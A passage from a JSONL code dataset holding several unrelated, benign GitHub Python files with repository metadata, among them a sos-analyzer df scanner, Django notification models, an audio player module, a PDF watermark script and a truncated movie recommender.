location=\"university-of-kentucky\", file_out=\"uk_data.csv\")\n process.start()","repo_name":"AgentEnder/OpenPayrollCrawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32070308458","text":"from numpy.random import random\nfrom numpy import sin,cos, true_divide\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.animation import FuncAnimation\n\ndef SieveOfEratosthenes(n):\n \n prime = [True for i in range(n + 1)]\n p = 2\n while (p * p <= n):\n # If prime[p] is not changed, then it is a prime\n if (prime[p] == True):\n \n # Update all multiples of p\n for i in range(p ** 2, n + 1, p):\n prime[i] = False\n p += 1\n prime[0]= False\n prime[1]= False\n # Print all prime numbers\n primelist = list()\n for p in range(n + 1):\n if prime[p]:\n primelist.append(p)#Use print(p) for python 3\n return primelist\n \nxdata = list()\nydata = list()\nzdata = list()\nxdata.append(0)\nydata.append(0)\nzdata.append(0)\n\nprimes = SieveOfEratosthenes(10000)\nprimes.insert(0,0)\nxprev = False\nyprev = False\nzprev = False\n\nfor i in range(0,len(primes)-1):\n if zprev == True or i == 0:\n xdata.append(xdata[i] + ( ((-1)**(i//3)) * (primes[i+1] - primes[i])))\n ydata.append(ydata[i])\n zdata.append(zdata[i])\n xprev = True\n zprev = False\n elif xprev == True:\n xdata.append(xdata[i])\n ydata.append(ydata[i] + ( ((-1)**(i//3)) * (primes[i+1] - primes[i]) ))\n zdata.append(zdata[i])\n xprev = False\n yprev = True\n elif yprev == True:\n xdata.append(xdata[i])\n ydata.append(ydata[i])\n zdata.append(zdata[i] + ( ((-1)**(i//3)) * (primes[i+1] - primes[i]) ))\n zprev = True\n yprev = False\n\n\nfig = plt.figure(frameon=False,figsize=(16,9))\n# Create 3D container\nax = plt.axes(projection = '3d')\nax.axis('off')\n# Visualize 3D scatter plot\nax.plot3D(xdata, ydata, zdata)\n# Give labels\nplt.show()\n","repo_name":"FililiX/CRC","sub_path":"bckup.py","file_name":"bckup.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31110034952","text":"import logging\nimport time \n\n# Create logger\n\nlogging.basicConfig(filename = \"/Users/User/Desktop/Python/Python_Socratica/Exceptions/problems.txt\", level = logging.DEBUG)\n\nlogger = logging.getLogger()\n\ndef read_file_timed(path):\n \"\"\"Return the contents of the file at 'path' and measure time required.\"\"\"\n\n start_time = time.time() # record the time when used\n try:\n f = open(path, mode=\"rb\")\n data = f.read()\n return data \n except FileNotFoundError as err:\n logger.error(err)\n raise \n else:\n f.close()\n finally:\n stop_time = time.time()\n dt = stop_time - start_time # subtracts the start and stop time\n logger.info(\"Time required for {file} = {time}\".format(file=path, time = dt))\n\npath = '/Users/User/Desktop/Python/Python_Socratica/TextFiles/oceans.txt'\n\ndata = read_file_timed(path)\n","repo_name":"Shaun103/Python_Notes","sub_path":"Python_Socratica/Exceptions/exception.py","file_name":"exception.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"32961615683","text":"from cv2 import FONT_HERSHEY_SIMPLEX\n\nWINDOW = {\n 'NAME': 'Parking lots'\n}\n\nPARKING = {\n 'WIDTH': 107,\n 'HEIGHT': 48\n}\n\nSPACE_COLORS = {\n 'AVAILABLE': (74, 242, 41),\n 'NOT_AVAILABLE': (24, 24, 244)\n}\n\nTEXT = {\n 'FONT': FONT_HERSHEY_SIMPLEX,\n 'SIZE': 2,\n 'SCALE': 0.65,\n 'COLORS': {\n 'RED': (24, 24, 244),\n 'BLUE': (122, 64, 14),\n 'ORANGE': (21, 130, 239)\n }\n}\n","repo_name":"NEVI0/parking-lot-detector","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"7265829080","text":"\nmonitors = [\n { \"name\":\"jetCSV4\", \"unit\":\"Sum of CSV2 of 4 Jets \", \"var\":\"jet_csv[0]+jet_csv[1]+jet_csv[2]+jet_csv[3]\", \"xbin_set\":[80,0,4] },\n { \"name\":\"MET\", \"unit\":\"Missing E_{T} without HF (GeV)\",\"var\":\"metNoHF\", \"xbin_set\":[60,0,300] },\n { \"name\":\"METpf\", \"unit\":\"Missing E_{T} (GeV)\", \"var\":\"met\", \"xbin_set\":[60,0,300] },\n { \"name\":\"ZMass\", \"unit\":\"Dilepton mass (GeV/c^{2}) \", \"var\":\"ll_zmass\", \"xbin_set\":[60,0,300] },\n { \"name\":\"nGoodPV\", \"unit\":\"# of good vertex \", \"var\":\"nGoodPV\", \"xbin_set\":[70,0,70] },\n { \"name\":\"nPV\", \"unit\":\"# of vertex \", \"var\":\"nPV\", \"xbin_set\":[70,0,70] },\n { \"name\":\"Stat\", \"unit\":\"Stat \", \"var\":\"met\", \"xbin_set\":[1,0,10000] },\n { \"name\":\"METPHI\", \"unit\":\"Missing E_{T} without HF #phi\", \"var\":\"metNoHFphi\",\"xbin_set\":[40,-4,4] },\n { \"name\":\"METmva\", \"unit\":\"MVA Missing E_{T} (GeV)\", \"var\":\"metPfMva\", \"xbin_set\":[60,0,300] },\n { \"name\":\"METPuppi\", \"unit\":\"Puppi Missing E_{T} (GeV)\", \"var\":\"metPuppi\", \"xbin_set\":[60,0,300] },\n { \"name\":\"nBJet20L\", \"unit\":\"b-Jet20 multiplicity loose \", \"var\":\"nBJet20L\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet20M\", \"unit\":\"b-Jet20 multiplicity medium \", \"var\":\"nBJet20M\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet20\", \"unit\":\"Jet20 multiplicity \", \"var\":\"nJet20\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet20T\", \"unit\":\"b-Jet20 multiplicity tight \", \"var\":\"nBJet20T\", \"xbin_set\":[6,0,6] },\n { \"name\":\"nBJet30L\", \"unit\":\"b-Jet30 multiplicity loose \", \"var\":\"nBJet30L\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet30M\", \"unit\":\"b-Jet30 multiplicity medium \", \"var\":\"nBJet30M\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet30\", \"unit\":\"Jet30 multiplicity \", \"var\":\"nJet30\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet30T\", \"unit\":\"b-Jet30 multiplicity tight \", \"var\":\"nBJet30T\", \"xbin_set\":[6,0,6] },\n { \"name\":\"lep1Pt\", \"unit\":\"Leading lepton p_{T} (GeV/c) \", \"var\":\"ll_lep1_pt\", \"xbin_set\":[40,0,200] },\n { \"name\":\"lep2Pt\", \"unit\":\"Sceond lepton p_{T} (GeV/c) \", \"var\":\"ll_lep2_pt\", \"xbin_set\":[40,0,200] },\n { \"name\":\"lep1Eta\", \"unit\":\"Leading lepton #eta \", \"var\":\"ll_lep1_eta\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"lep2Eta\", \"unit\":\"Sceond lepton #eta \", \"var\":\"ll_lep2_eta\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"lep1Phi\", \"unit\":\"Leading lepton #phi \", \"var\":\"ll_lep1_phi\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"lep2Phi\", \"unit\":\"Sceond lepton #phi \", \"var\":\"ll_lep2_phi\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"lep1Iso\", \"unit\":\"Leading lepton Iso_{rel} \", \"var\":\"ll_lep1_iso\", \"xbin_set\":[20,0,1] },\n { \"name\":\"lep2Iso\", \"unit\":\"Sceond lepton Iso_{rel} \", \"var\":\"ll_lep2_iso\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet1Pt\", \"unit\":\"p_T of 1st leading Jet \", \"var\":\"jet_pt[0]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet2Pt\", \"unit\":\"p_T of 2nd leading Jet \", \"var\":\"jet_pt[1]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet3Pt\", \"unit\":\"p_T of 3rd leading Jet \", \"var\":\"jet_pt[2]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet4Pt\", \"unit\":\"p_T of 4th leading Jet \", \"var\":\"jet_pt[3]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jet1Eta\", \"unit\":\"#eta of 1st leading Jet \", \"var\":\"jet_eta[0]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet2Eta\", \"unit\":\"#eta of 2nd leading Jet \", \"var\":\"jet_eta[1]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet3Eta\", \"unit\":\"#eta of 3rd leading Jet \", \"var\":\"jet_eta[2]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet4Eta\", \"unit\":\"#eta of 4th leading Jet \", \"var\":\"jet_eta[3]\", \"xbin_set\":[30,-3,3] },\n { \"name\":\"jet1Phi\", \"unit\":\"#phi of 1st leading Jet \", \"var\":\"jet_phi[0]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet2Phi\", \"unit\":\"#phi of 2nd leading Jet \", \"var\":\"jet_phi[1]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet3Phi\", \"unit\":\"#phi of 3rd leading Jet \", \"var\":\"jet_phi[2]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet4Phi\", \"unit\":\"#phi of 4th leading Jet \", \"var\":\"jet_phi[3]\", \"xbin_set\":[40,-4,4] },\n { \"name\":\"jet1CSV\", \"unit\":\"CSV2 of 1st leading Jet \", \"var\":\"jet_csv[0]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet2CSV\", \"unit\":\"CSV2 of 2nd leading Jet \", \"var\":\"jet_csv[1]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet3CSV\", \"unit\":\"CSV2 of 3rd leading Jet \", \"var\":\"jet_csv[2]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet4CSV\", \"unit\":\"CSV2 of 4th leading Jet \", \"var\":\"jet_csv[3]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP1CSV\", \"unit\":\"CSV2 of 1st leading JetPuppi \", \"var\":\"jetPuppi_csv[0]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP2CSV\", \"unit\":\"CSV2 of 2nd leading JetPuppi \", \"var\":\"jetPuppi_csv[1]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP3CSV\", \"unit\":\"CSV2 of 3rd leading JetPuppi \", \"var\":\"jetPuppi_csv[2]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP4CSV\", \"unit\":\"CSV2 of 4th leading JetPuppi \", \"var\":\"jetPuppi_csv[3]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jetPP1Pt\", \"unit\":\"p_T of 1st leading JetPuppi \", \"var\":\"jetPuppi_pt[0]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jetPP2Pt\", \"unit\":\"p_T of 2nd leading JetPuppi \", \"var\":\"jetPuppi_pt[1]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jetPP3Pt\", \"unit\":\"p_T of 3rd leading JetPuppi \", \"var\":\"jetPuppi_pt[2]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"jetPP4Pt\", \"unit\":\"p_T of 4th leading JetPuppi \", \"var\":\"jetPuppi_pt[3]\", \"xbin_set\":[40,0,400] },\n { \"name\":\"nBJet20LPuppi\", \"unit\":\"b-Jet20Puppi multiplicity loose \", \"var\":\"nBJet20LPuppi\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet20MPuppi\", \"unit\":\"b-Jet20Puppi multiplicity medium \", \"var\":\"nBJet20MPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet20Puppi\", \"unit\":\"Jet20Puppi multiplicity \", \"var\":\"nJet20Puppi\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet20TPuppi\", \"unit\":\"b-Jet20Puppi multiplicity tight \", \"var\":\"nBJet20TPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"nBJet30LPuppi\", \"unit\":\"b-Jet30Puppi multiplicity loose \", \"var\":\"nBJet30LPuppi\", \"xbin_set\":[8,0,8] },\n { \"name\":\"nBJet30MPuppi\", \"unit\":\"b-Jet30Puppi multiplicity medium \", \"var\":\"nBJet30MPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"NJet30Puppi\", \"unit\":\"Jet30Puppi multiplicity \", \"var\":\"nJet30Puppi\", \"xbin_set\":[10,0,10] },\n { \"name\":\"nBJet30TPuppi\", \"unit\":\"b-Jet30Puppi multiplicity tight \", \"var\":\"nBJet30TPuppi\", \"xbin_set\":[6,0,6] },\n { \"name\":\"Nlep\", \"unit\":\"number of lepton \", \"var\":\"lepton_N\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"Nmu\", \"unit\":\"number of muon \", \"var\":\"Nmu\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NmuIso\", \"unit\":\"number of muon \", \"var\":\"NmuIso\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"Nel\", \"unit\":\"number of electron \", \"var\":\"Nel\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NelIso\", \"unit\":\"number of electron \", \"var\":\"NelIso\", \"xbin_set\":[5,0,5] },\n]\n\nmonitors2d = {\n\"Mon1\" : [\n { \"name\":\"jet1CSV\", \"unit\":\"CSV2 of 1st leading Jet \", \"var\":\"jet_csv[0]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet2CSV\", \"unit\":\"CSV2 of 2nd leading Jet \", \"var\":\"jet_csv[1]\", \"xbin_set\":[20,0,1] },\n],\n\"Mon2\" : [\n { \"name\":\"jet3CSV\", \"unit\":\"CSV2 of 3rd leading Jet \", \"var\":\"jet_csv[2]\", \"xbin_set\":[20,0,1] },\n { \"name\":\"jet4CSV\", \"unit\":\"CSV2 of 4th leading Jet \", \"var\":\"jet_csv[3]\", \"xbin_set\":[20,0,1] },\n],\n#\"Mon27\" : [\n# { \"name\":\"NJet\", \"unit\":\"Jet multiplicity \", \"var\":\"nJet\", \"xbin_set\":[10,0,10] },\n# { \"name\":\"nBJetL\", \"unit\":\"b-Jet multiplicity loose \", \"var\":\"nBJetL\", \"xbin_set\":[8,0,8] },\n# { \"name\":\"nBJetM\", \"unit\":\"b-Jet multiplicity medium \", \"var\":\"nBJetM\", \"xbin_set\":[8,0,8] },\n# { \"name\":\"nBJetT\", \"unit\":\"b-Jet multiplicity tight \", \"var\":\"nBJetT\", \"xbin_set\":[8,0,8] },\n#],\n#\"Mon27\" : [\n# { \"name\":\"NJet\", \"unit\":\"Jet multiplicity \", \"var\":\"nJet\", \"xbin_set\":[10,0,10] },\n# { \"name\":\"genNJet\", \"unit\":\"genJet multiplicity \", \"var\":\"NgenJet\", \"xbin_set\":[10,0,10] },\n# { \"name\":\"Category\", \"unit\":\"Category \", \"var\":\"Category\", \"xbin_set\":[5,0,5] },\n#],\n#\"Mon28\" : [\n## { \"name\":\"Nmu\", \"unit\":\"number of muon \", \"var\":\"Nmu\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NmuIso\", \"unit\":\"number of muon \", \"var\":\"NmuIso\", \"xbin_set\":[5,0,5] },\n## { \"name\":\"Nel\", \"unit\":\"number of electron \", \"var\":\"Nel\", \"xbin_set\":[5,0,5] },\n# { \"name\":\"NelIso\", \"unit\":\"number of electron \", \"var\":\"NelIso\", \"xbin_set\":[5,0,5] },\n#],\n}\n","repo_name":"YoungKwonJo/Analysis","sub_path":"CATTools/plots/monitors_cfi.py","file_name":"monitors_cfi.py","file_ext":"py","file_size_in_byte":9298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37965061477","text":"# -*- coding: utf-8 -*-\n\nname = u'pbr'\n\nversion = '3.1.1'\n\ndescription = \\\n \"\"\"\n pbr library \n \"\"\"\n\nrequires = [ ]\n\nvariants = []\n\ndef commands():\n import os\n \n pbr_libs_path = os.path.join(getenv(\"PYTHON_LIBS_PATH\"), \"pbr\", \"%s\"%version)\n\n # env.PATH.append(os.path.join(pbr_libs_path, 'lib'))\n\n env.PYTHONPATH.append(os.path.join(pbr_libs_path, 'lib'))\n","repo_name":"cashmerepipeline/CashmereRez","sub_path":"PythonLibraries/pbr/3.1.1/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13910029689","text":"# -*- coding: utf-8 -*-\n# Author: Satoru SATOH \n# License: GPLv3+\n#\n\"\"\"df output formats:\n1:\nFilesystem 1K-ブロック 使用 使用可 使用% マウント位置\n/dev/mapper/vg_rhel6client1-lv_root\n 4684748 2668868 1777904 61% /\ntmpfs 510292 0 510292 0% /dev/shm\n/dev/vda1 495844 73591 396653 16% /boot\n\n2:\nファイルシス 1K-ブロック 使用 使用可 使用% マウント位置\ndevtmpfs 8164368 0 8164368 0% /dev\ntmpfs 8209916 0 8209916 0% /dev/shm\ntmpfs 8209916 21596 8188320 1% /run\ntmpfs 8209916 0 8209916 0% /sys/fs/cgroup\n/dev/mapper/vg0-lv_root 1920455616 836477948 986401120 46% /\ntmpfs 8209916 0 8209916 0% /tmp\n/dev/sda1 194241 101223 78682 57% /boot\n/dev/mapper/vg0_lv_data 1952559608 1187673728 764885880 61% /srv/data\n\"\"\"\nimport logging\nimport sos_analyzer.scanner.base\n\n\nLOGGER = logging.getLogger(__name__)\n\nSTATES = (AT_HEADER, IN_ENTRIES) = (\"at_header\", \"in_entries\")\n\nFS_RE = r\"^(?P[a-z/]\\S+)\"\nFS_REST_RE = r\"\\s+(?P\\d+)\\s+\" + \\\n r\"(?P\\d+)\\s+(?P\\d+)\\s+\" + \\\n r\"(?:(?P\\d+)%|-)\\s+(?P/\\S*)$\"\n\nFS_ML_0_RE = FS_RE + r\"$\"\nFS_ML_1_RE = r\"^\" + FS_REST_RE\nFS_SL_RE = FS_RE + FS_REST_RE\nIGNORE_RE = r\"^\\#.*$\"\n\nCONF = dict(initial_state=AT_HEADER,\n patterns=dict(ignore=IGNORE_RE,\n fs_multilines_0=FS_ML_0_RE,\n fs_multilines_1=FS_ML_1_RE,\n fs_line=FS_SL_RE))\n\n\nclass Scanner(sos_analyzer.scanner.base.BaseScanner):\n\n name = input_name = \"df\"\n conf = CONF\n state = initial_state = AT_HEADER\n entry = {}\n\n def parse_impl(self, state, line, i, *args, **kwargs):\n \"\"\"\n :param state: A dict object represents internal state\n :param line: Content of the line\n :param i: Line number in the input file\n :return: A dict instance of parsed result\n \"\"\"\n if self.state == AT_HEADER: # Use self.state instead of state passed.\n self.state = IN_ENTRIES\n LOGGER.debug(\"state changed: %s -> %s, line=%s\",\n AT_HEADER, IN_ENTRIES, line)\n return None\n\n if self.match(\"ignore\", line):\n # LOGGER.debug(\"ignored: line=%s\", line)\n return None\n\n m = self.match(\"fs_line\", line)\n if m:\n # LOGGER.debug(\"line=%s, matched=\", line)\n return m.groupdict()\n\n m = self.match(\"fs_multilines_0\", line)\n if m:\n self.entry = m.groupdict()\n # LOGGER.debug(\"line=%s, matched=\", line)\n return None\n\n m = self.match(\"fs_multilines_1\", line)\n if m:\n entry = self.entry.copy()\n entry.update(m.groupdict())\n self.entry = {}\n # LOGGER.debug(\"line=%s, matched=\", line)\n return entry\n\n return None\n\n# vim:sw=4:ts=4:et:\n","repo_name":"ssato/sos-analyzer","sub_path":"sos_analyzer/scanner/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"12641194206","text":"from django.db import models\nfrom django.conf import settings\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass Notification(models.Model):\n \"\"\"\n Notification\n \"\"\"\n class Meta:\n verbose_name = _('notification')\n verbose_name_plural = _('notifications')\n ordering = ['order']\n\n objects = models.Manager() # linters don't worry, be happy\n\n code_name = models.CharField(\n max_length=40,\n default='',\n blank=False,\n null=False,\n unique=True,\n verbose_name=_('code name')\n )\n order = models.PositiveIntegerField(\n blank=True,\n null=True,\n verbose_name=_('order'),\n )\n name = models.CharField(\n max_length=100,\n default='',\n blank=True,\n null=True,\n verbose_name=_('name')\n )\n description = models.CharField(\n max_length=250,\n default='',\n blank=True,\n null=True,\n verbose_name=_('description')\n )\n header_template = models.TextField(\n default='',\n blank=True,\n verbose_name=_('header template')\n )\n body_template = models.TextField(\n default='',\n blank=True,\n verbose_name=_('body template')\n )\n\n def __str__(self):\n return str(self.name or self.code_name)\n\n\nclass UserNotification(models.Model):\n \"\"\"\n User notification\n \"\"\"\n class Meta:\n verbose_name = _('user notification')\n verbose_name_plural = _('user notifications')\n\n objects = models.Manager() # linters don't worry, be happy\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, models.PROTECT,\n null=False,\n blank=False,\n verbose_name=_('user'),\n related_name='notifications',\n )\n\n notification = models.ForeignKey(\n Notification, models.PROTECT,\n null=False,\n blank=False,\n verbose_name=_('notification'),\n related_name='users',\n )\n\n enabled = models.BooleanField(\n default=True,\n verbose_name=_('enabled')\n )\n\n def __str__(self):\n return \"%s - %s\" % (\n self.user, self.notification.name or self.notification.code_name)\n\n\nclass IncomeMail(models.Model):\n sender = models.CharField(\n max_length=200,\n blank=False,\n )\n recipient = models.CharField(\n max_length=200,\n blank=False,\n )\n sender_mail = models.CharField(\n max_length=200,\n blank=False,\n )\n recipient_mail = models.CharField(\n max_length=200,\n blank=False,\n )\n headers = models.TextField(\n blank=False,\n )\n body = models.TextField(\n default='',\n blank=True,\n )\n","repo_name":"kozzztik/tulius","sub_path":"tulius/events/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"32746229998","text":"import sys\nimport os\nimport msvcrt\nimport random\n#Check if script is called as main module\nimport sys\nif __name__ == \"__main__\":\n\tprint(\"\\nThis module is not meant to be executed standalone!\")\n\tsys.exit(0)\n\nfrom time import sleep\nimport json\n\nos.environ[\"PYGAME_HIDE_SUPPORT_PROMPT\"] = \"hide\"\nimport pygame\n\nimport patapvars\nfrom patapclasses import globals, nowPlaying, pressedCharacter, PlaylistData\n\ndef saveFiles():\n\t#Save options\n\tpatapvars.options[\"volume\"] = pygame.mixer_music.get_volume()\n\twith open(patapvars.scriptDir + \"/options.json\",\"w\") as file:\n\t\tjson.dump(patapvars.options, file, indent=4)\n\n\t#Append played songs to log\n\twith open(patapvars.scriptDir + \"/play.log\",\"a\") as file:\n\t\tif not nowPlaying.logged:\n\t\t\tfile.write(nowPlaying.path + \"\\n\")\n\t\t\tnowPlaying.logged = True\ndef countfiles(path):\n\treturn len([entry for entry in os.scandir(path) if entry.is_file() and entry.name.endswith(\".mp3\")])\ndef setGlobalChar(event):\n\tpressedCharacter.globalChar = event\ndef getChar():\n\twhile patapvars.shouldRun:\n\t\tpressedCharacter.char = msvcrt.getwch()\ndef loading_animation(str):\n\tarray = [\"/\", \"—\", \"\\\\\", \"|\"]\n\tn = 0\n\twhile patapvars.loadingAnimation:\n\t\tprint(\"\\r\" + array[n] + \" \" + str, end=\"\")\n\t\tsleep(0.15)\n\t\tif n == 3:\n\t\t\tn = 0\n\t\telse:\n\t\t\tn += 1\n\tsys.exit(0)\ndef wait(seconds = 0.2):\n\tpressedCharacter.char = \"\"\n\tsleep(seconds)\ndef lineBreak():\n\tif (globals.lastCommandWasVolume):\n\t\tglobals.lastCommandWasVolume = False\n\t\tprint()\ndef play(files):\n\tif len(files) == 1:\n\t\ttype = \"song\"\n\telif len(files) > 1:\n\t\ttype = \"playlist\"\n\twhile patapvars.shouldRun:\n\t\tif globals.shouldRunB:\n\t\t\tfor event in pygame.event.get():\n\t\t\t\tif event.type == pygame.USEREVENT + 1:\n\t\t\t\t\tsaveFiles() #Save files\n\t\t\t\t\tif patapvars.loopSong:\n\t\t\t\t\t\tpygame.mixer_music.play()\n\n\t\t\t\t\t\t#Add to log\n\t\t\t\t\t\tpatapvars.songLog.append(nowPlaying.path)\n\t\t\t\t\telse:\n\t\t\t\t\t\tnowPlaying.paused = None\n\t\telse:\n\t\t\tglobals.shouldRunB = True\n\t\tif (not pygame.mixer_music.get_busy()) and (nowPlaying.paused == None):\n\t\t\tif files:\n\t\t\t\tindex = -1\n\t\t\t\tif (type == \"playlist\"):\n\t\t\t\t\twhile True:\n\t\t\t\t\t\tif patapvars.options[\"shuffle\"]:\n\t\t\t\t\t\t\tindex = random.randint(0, len(files)-1)\n\t\t\t\t\t\tif nowPlaying.path != files[index].path: break\n\t\t\t\t\t\tif not patapvars.options[\"shuffle\"]: break\n\t\t\t\tpygame.mixer_music.load(files[index].path)\n\n\t\t\t\t#Change nowPlaying object\n\t\t\t\tnowPlaying.name = files[index].name\n\t\t\t\tnowPlaying.path = files[index].path\n\t\t\t\tnowPlaying.paused = False\n\t\t\t\tnowPlaying.length = files[index].length\n\t\t\t\tnowPlaying.positionOffset = files[index].positionOffset\n\t\t\t\tnowPlaying.logged = False\n\n\t\t\t\t#Add to log\n\t\t\t\tpatapvars.songLog.append(files[index].path)\n\n\t\t\t\tpygame.mixer_music.play()\n\t\t\t\tif (not patapvars.options[\"shuffle\"]) or (patapvars.options[\"shuffle\"] and not patapvars.options[\"shuffleIndefinitely\"]):\n\t\t\t\t\tfiles.pop(index)\n\t\t\t\tif (type == \"playlist\"):\n\t\t\t\t\tnowPlaying.playlist = PlaylistData()\n\t\t\t\t\tif (patapvars.options[\"shuffle\"]) and (patapvars.options[\"shuffleIndefinitely\"]):\n\t\t\t\t\t\tnowPlaying.playlist.files = []\n\t\t\t\t\t\tnowPlaying.playlist.shuffleIndefinitely = True\n\t\t\t\t\telse:\n\t\t\t\t\t\tnowPlaying.playlist.files = files\n\t\t\t\t\t\tnowPlaying.playlist.shuffleIndefinitely = False\n\t\t\t\telse:\n\t\t\t\t\tnowPlaying.playlist = None\n\t\t\telse:\n\t\t\t\tprint(\"{} ended! Start a new song or playlist?\".format(type.capitalize()))\n\n\t\t\t\t#Change nowPlaying object\n\t\t\t\tnowPlaying.name = None\n\t\t\t\tnowPlaying.path = None\n\t\t\t\tnowPlaying.paused = None\n\t\t\t\tnowPlaying.length = None\n\t\t\t\tnowPlaying.positionOffset = 0\n\t\t\t\tnowPlaying.playlist = None\n\t\t\t\tnowPlaying.logged = False\n\t\t\t\t\n\t\t\t\tsys.exit(0)\t\t#Exit thread","repo_name":"IsakTheHacker/AT-Audio-Player","sub_path":"Python AT Audio Player/patapfuncs.py","file_name":"patapfuncs.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"23290145706","text":"#! python3\r\n# Simple PDF overlaying script. The page numbers should be equal\r\n\r\nimport PyPDF2\r\nsimple_pdf = open('test2.pdf', 'rb')\r\nwatermark_pdf = open('watermark.pdf', 'rb')\r\n\r\nsimple_reader = PyPDF2.PdfFileReader(simple_pdf)\r\nwatermark_reader = PyPDF2.PdfFileReader(watermark_pdf)\r\n\r\npdf_writer = PyPDF2.PdfFileWriter()\r\n\r\nfor page_number in range(0, simple_reader.numPages): # define pages number\r\n page = simple_reader.getPage(page_number)\r\n page.mergePage(watermark_reader.getPage(page_number)) # define required page\r\n pdf_writer.addPage(page)\r\n\r\nresult_pdf = open('result.pdf', 'wb')\r\npdf_writer.write(result_pdf)\r\n\r\nwatermark_pdf.close()\r\nsimple_pdf.close()","repo_name":"mnakhaev/python-practice","sub_path":"automate_with_python/pdf_apps/pdf_watermark.py","file_name":"pdf_watermark.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72587929524","text":"import csv\r\n\r\nwith open(r\"C:\\Users\\hp\\Downloads\\Book1.csv\", newline='') as f: #change this file directory\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport difflib\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\n\r\nmovies_data = pd.read_csv(r\"C:\\Users\\hp\\Downloads\\movies.csv\")\r\n\r\nselected_features = ['genres','keywords','tagline','cast','director']\r\n\r\nfor feature in selected_features:\r\n movies_data[feature] = movies_data[feature].fillna('')\r\n\r\ncombined_features = movies_data['genres']+' '+movies_data['keywords']+' '+movies_data['tagline']+' '+movies_data['cast']+' '+movies_data['director']\r\nvectorizer = TfidfVectorizer()\r\nfeature_vectors = vectorizer.fit_transform(combined_features)\r\nsimilarity = cosine_similarity(feature_vectors)\r\n\r\nist2=[]\r\nfor i in data:\r\n count=0\r\n ist=[]\r\n recommend=[]\r\n user_id=[]\r\n user_watched=[]\r\n for b in i:\r\n if count==0:\r\n print(\"user id:\",b)\r\n user_id=b\r\n ist.append(user_id)\r\n if count%2 != 0 and count != 0:\r\n movie_name=b\r\n user_watched.append(movie_name)\r\n \r\n if count%2 == 0 and count != 0:\r\n user_rating=b\r\n \r\n if user_rating == 'null':\r\n user_rating=5\r\n if int(user_rating) >= 3:\r\n movie_name = movie_name\r\n list_of_all_titles = movies_data['title'].tolist()\r\n find_close_match = difflib.get_close_matches(movie_name, list_of_all_titles)\r\n close_match = find_close_match[0]\r\n index_of_the_movie = 